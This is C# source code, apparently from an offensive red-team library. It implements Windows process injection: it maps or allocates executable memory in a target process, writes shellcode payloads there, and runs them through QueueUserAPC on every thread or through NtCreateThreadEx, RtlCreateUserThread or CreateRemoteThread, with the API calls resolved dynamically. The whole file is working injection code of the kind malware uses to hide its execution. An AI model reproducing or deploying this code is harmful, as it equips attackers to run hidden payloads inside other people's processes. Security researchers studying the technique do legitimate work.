/// <summary> /// Opens a Thread and Queues UserAPC in a specified process. /// </summary> /// <author>The Wover (@TheRealWover)</author> /// <param name="Payload">The shellcode payload to execute in the target process.</param> /// <param name="BaseAddress">The address of the shellcode in the target process.</param> /// <param name="Process">The target process to inject into.</param> /// <returns></returns> public bool Inject(PICPayload Payload, IntPtr BaseAddress, Process Process) { /* * IntPtr tpointer = DynamicInvoke.Win32.OpenThread(Data.Win32.Kernel32.ThreadAccess.SetContext, false, (int)pi.dwThreadId); * DynamicInvoke.Win32.VirtualProtectEx(pi.hProcess, alloc, sc.Length, 0x20, out oldProtect); * DynamicInvoke.Win32.QueueUserAPC(alloc, tpointer, IntPtr.Zero); * DynamicInvoke.Win32.ResumeThread(pi.hThread); * * IntPtr threadHandle = new IntPtr(); * Data.Native.NTSTATUS result = Data.Native.NTSTATUS.Unsuccessful; */ uint oldProtect = 0; bool success = false; try { IntPtr procHandle = Process.Handle; success = DynamicInvoke.Win32.VirtualProtectEx(procHandle, BaseAddress, Payload.Payload.Length, Data.Win32.WinNT.PAGE_EXECUTE_READ, out oldProtect); foreach (ProcessThread thread in Process.Threads) { IntPtr hThread = DynamicInvoke.Win32.OpenThread(Data.Win32.Kernel32.ThreadAccess.All, false, (int)thread.Id); IntPtr ptr = DynamicInvoke.Win32.QueueUserAPC(BaseAddress, hThread, IntPtr.Zero); } success = true; return(success); } catch (Exception e) { Console.WriteLine(e.Message); return(success); } }
/// <summary> /// Allocate the payload in the target process. /// </summary> /// <author>The Wover (@TheRealWover)</author> /// <param name="Payload">The PIC payload to allocate to the target process.</param> /// <param name="Process">The target process.</param> /// <param name="PreferredAddress">The preferred address at which to allocate the payload in the target process.</param> /// <returns>Base address of allocated memory within the target process's virtual memory space.</returns> public IntPtr Allocate(PICPayload Payload, Process Process, IntPtr PreferredAddress) { // Get a convenient handle for the target process. IntPtr procHandle = Process.Handle; // Create a section to hold our payload IntPtr sectionAddress = CreateSection((uint)Payload.Payload.Length, sectionAttributes); // Map a view of the section into our current process with RW permissions SectionDetails details = MapSection(Process.GetCurrentProcess().Handle, sectionAddress, localSectionPermissions, IntPtr.Zero, Convert.ToUInt32(Payload.Payload.Length)); // Copy the shellcode to the local view System.Runtime.InteropServices.Marshal.Copy(Payload.Payload, 0, details.baseAddr, Payload.Payload.Length); // Now that we are done with the mapped view in our own process, unmap it Data.Native.NTSTATUS result = UnmapSection(Process.GetCurrentProcess().Handle, details.baseAddr); // Now, map a view of the section to other process. It should already hold the payload. SectionDetails newDetails; if (PreferredAddress != IntPtr.Zero) { // Attempt to allocate at a preferred address. May not end up exactly at the specified location. // Refer to MSDN documentation on ZwMapViewOfSection for details. newDetails = MapSection(procHandle, sectionAddress, remoteSectionPermissions, PreferredAddress, (ulong)Payload.Payload.Length); } else { newDetails = MapSection(procHandle, sectionAddress, remoteSectionPermissions, IntPtr.Zero, (ulong)Payload.Payload.Length); } return(newDetails.baseAddr); }
/// <summary> /// Allocate the payload in the target process. /// </summary> /// <param name="Payload">The PIC payload to allocate to the target process.</param> /// <param name="Process">The target process.</param> /// <returns>Base address of allocated memory within the target process's virtual memory space.</returns> /// public IntPtr Allocate(PICPayload Payload, Process Process) { if (!IsSupportedPayloadType(Payload)) { throw new PayloadTypeNotSupported(Payload.GetType()); } // Get a convenient handle for the target process. IntPtr procHandle = DynamicInvoke.Win32.OpenProcess(Data.Win32.Kernel32.ProcessAccessFlags.PROCESS_VM_OPERATION | Data.Win32.Kernel32.ProcessAccessFlags.PROCESS_VM_WRITE | Data.Win32.Kernel32.ProcessAccessFlags.PROCESS_VM_READ, false, (uint)Process.Id); //create a IntPtr to return the base address of the allocated mem IntPtr alloc = DynamicInvoke.Win32.VirtualAllocEx(procHandle, IntPtr.Zero, (uint)Payload.Payload.Length, Data.Win32.Kernel32.MEM_COMMIT | Data.Win32.Kernel32.MEM_RESERVE, Data.Win32.WinNT.PAGE_EXECUTE_READWRITE); UIntPtr bytesWritten = UIntPtr.Zero; Boolean success = DynamicInvoke.Win32.WriteProcessMemory(procHandle, alloc, Payload.Payload, (uint)Payload.Payload.Length, out bytesWritten); if (success) { return(alloc); } else { throw new Exception("an error occured trying to write memory into the process."); } }
public bool Inject(PICPayload Payload, AllocationTechnique AllocationTechnique, Process Process) { IntPtr baseAddr = AllocationTechnique.Allocate(Payload, Process); return(Inject(Payload, baseAddr, Process)); }
/// <summary> /// Create a thread in the remote process. /// </summary> /// <author>The Wover (@TheRealWover)</author> /// <param name="Payload">The shellcode payload to execute in the target process.</param> /// <param name="BaseAddress">The address of the shellcode in the target process.</param> /// <param name="Process">The target process to inject into.</param> /// <returns></returns> public bool Inject(PICPayload Payload, IntPtr BaseAddress, Process Process) { IntPtr threadHandle = new IntPtr(); Data.Native.NTSTATUS result = Data.Native.NTSTATUS.Unsuccessful; if (api == APIS.NtCreateThreadEx) { // Dynamically invoke NtCreateThreadEx to create a thread at the address specified in the target process. result = DynamicInvoke.Native.NtCreateThreadEx( ref threadHandle, Data.Win32.WinNT.ACCESS_MASK.SPECIFIC_RIGHTS_ALL | Data.Win32.WinNT.ACCESS_MASK.STANDARD_RIGHTS_ALL, IntPtr.Zero, Process.Handle, BaseAddress, IntPtr.Zero, suspended, 0, 0, 0, IntPtr.Zero ); } else if (api == APIS.RtlCreateUserThread) { // Dynamically invoke NtCreateThreadEx to create a thread at the address specified in the target process. result = DynamicInvoke.Native.RtlCreateUserThread( Process.Handle, IntPtr.Zero, suspended, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, BaseAddress, IntPtr.Zero, ref threadHandle, IntPtr.Zero ); } else if (api == APIS.CreateRemoteThread) { uint flags = suspended ? (uint)0x00000004 : 0; IntPtr threadid = new IntPtr(); // Dynamically invoke NtCreateThreadEx to create a thread at the address specified in the target process. threadHandle = DynamicInvoke.Win32.CreateRemoteThread( Process.Handle, IntPtr.Zero, 0, BaseAddress, IntPtr.Zero, flags, ref threadid ); if (threadHandle == IntPtr.Zero) { return(false); } handle = threadHandle; return(true); } // If successful, return the handle to the new thread. Otherwise return NULL if (result != Data.Native.NTSTATUS.Success) { return(false); } handle = threadHandle; return(true); }